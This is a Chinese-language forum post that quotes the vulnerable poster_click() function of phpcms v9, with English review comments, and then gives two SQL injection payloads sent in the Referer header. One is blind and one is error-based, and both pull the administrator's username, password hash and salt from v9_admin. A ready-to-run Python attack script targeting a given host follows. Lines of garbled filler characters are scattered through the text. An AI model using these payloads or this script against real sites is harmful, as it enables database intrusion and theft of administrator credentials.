有人放出了phpcms v9的0day,就随手写了个利用代码,其中注入代码有两种形式:
问题函数 \phpcms\modules\poster\index.php
/**
 * Record a click on the poster row selected by $_GET['id'] and redirect to its link.
 *
 * Data flow worth knowing when reviewing this method:
 *  - id and siteid are read from $_GET and cast with intval() before use.
 *  - The click row written to s_db carries HTTP_REFERER and the cookie-derived
 *    $username verbatim; nothing in this method escapes them. Whether
 *    $this->s_db->insert() escapes its values is not visible here — the page this
 *    function is quoted on demonstrates that, for the referer value, it does not.
 *  - When the poster has more than one setting entry, the redirect target is taken
 *    from $_GET['url'] as-is and handed to header('Location: ...') without any
 *    validation of the destination.
 *
 * @return bool|void false when no poster row matches $id; otherwise no value is
 *         returned and a Location header is emitted.
 */
public function poster_click() {
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    // Only exit that does not end in a redirect.
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    // presumably the raw cookie value; whether param::get_cookie() sanitises it is not visible here
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // HTTP_REFERER is presumably the request's Referer header (the exploit text
        // above relies on that); it reaches the insert without escaping.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        // Caller-controlled redirect target when several settings exist.
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    header('Location: '.$url);
}
. s) \5 s" e9 x2 a! ]" Z
- W: g( L5 {& W5 r- I8 Y1 k
利用方式:
1、可以采用盲注入的手法:
& b! W. J |/ m- o( ^7 Ureferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
3 g) h8 z9 q+ B
: y' V) s d5 P% }7 Z通过返回页面,正常与否一个个猜解密码字段。
' n& ?: }+ X) T2 |! P* G7 _3 u6 N5 e( k% s" `* Z
2、代码是花开写的,随手附上了:
7 i6 ^; [* a" q+ @
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
% {+ B: n7 K8 m7 W# N4 y( J, v, ]5 r) I7 ~
此方法是爆错注入手法,原理自查。
; M. { b, G3 a
+ ]1 ~1 P) T2 q: h- Y# y+ Y1 D7 H `6 I! Y x* J3 T% x/ j2 H
% z1 F" `/ L- ~& n8 X2 |
利用程序:
' ?9 o/ x; S+ s2 T8 d
#!/usr/bin/env python
, O3 O, F) ~5 p$ I A fimport httplib,sys,re
! j/ V8 {: s5 o! U3 d- v5 O' L
def attack():
    """Send one GET to the poster_click action with the SQL payload in the Referer
    header and print the "Duplicate entry ..." fragment found in the response.

    Reads sys.argv[1] (host) and sys.argv[2] (base path of the phpcms install).
    If the response body contains no "Duplicate entry" text, ``datas[0]`` raises
    IndexError and ``conn.close()`` is never reached.
    """
    print "Code by Pax.Mac Team conqu3r!"
    print "Welcome to our zone!!!"
    url=sys.argv[1]
    paths=sys.argv[2]
    conn = httplib.HTTPConnection(url)
    # The payload travels in the Referer header, not the query string: that is the
    # value poster_click() stores unescaped. Any request log or proxy that records
    # the Referer field will show it verbatim, which is what to look for in logs.
    i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
    "Accept": "text/plain",
    "Referer": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#"}
    conn.request("GET", paths+"/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2", headers = i_headers)
    r1 = conn.getresponse()
    datas=r1.read()
    # Relies on the application echoing MySQL's error text into the page; a site
    # that does not display database errors yields an empty match list here.
    datas=re.findall(r"Duplicate entry \'\w+'", datas)
    print datas[0]
    conn.close()
# Entry point: expects argv[1] = host and argv[2] = base path, otherwise prints
# usage and exits 1. NOTE(review): the usage strings contain typos ("Usgae",
# "phpcmsataack"); they are runtime text and left untouched here.
if __name__=="__main__":
    if len(sys.argv)<3:
        print "Code by Pax.Mac Team conqu3r"
        print "Usgae:"
        print " phpcmsattack.py www.paxmac.org /"
        print " phpcmsataack.py www.paxmac.org /phpcmsv9/"
        sys.exit(1)
    attack()
& T2 F, K" _" Y3 ^7 N
|